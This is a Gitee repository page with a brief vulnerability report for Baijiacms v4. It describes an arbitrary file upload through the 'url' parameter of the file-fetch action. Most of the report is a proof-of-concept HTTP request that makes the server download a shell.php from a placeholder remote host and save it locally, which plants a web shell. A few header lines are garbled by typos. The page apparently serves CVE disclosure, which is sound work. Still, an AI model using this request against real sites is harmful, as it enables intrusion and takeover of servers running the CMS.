1 Star 0 Fork 0

To-LingJing / Cve number

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
Cve number.md 1.67 KB
一键复制 编辑 Web IDE 原始数据 按行查看 历史

Arbitrary file upload exists in Baijiacms

vendor:https://baijiacms.github.io/

download link:https://github.com/baijiacms/baijiacmsV4.git

Vulnerability trigger parameter:&url

The process of vulnerability discovery is as follows:

image

poc

GET
/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=public&do=file&op=fetch&url=http://ip:port/shell.php&status=1&beid=1 HTTP/1.1 
Host:127.0.0.1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64;x64; rv:91.0) Gecko/20100101 Firefox/91.0 
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language:zh-CN,zh;g=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, def late Gonnection: c lose 
Referer:
http://127.0.0.1/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=manager&do=dev&beid=1 
Cookie: PHPSESSID=n3Ig3p80u2sdcgbrdI7paj8145 
Upgrade-Insecure-Requests:1 
Sec-Fetch-Dest: document 
Sec-Fetch-Mode: navigate 
Sec-Fetch-Site: same-origin 
Sec-Fetch-User:?1

Files can be downloaded from a remote server and saved locally image

image

1
https://gitee.com/cui-yiwei/cve-number.git
git@gitee.com:cui-yiwei/cve-number.git
cui-yiwei
cve-number
Cve number
master

搜索帮助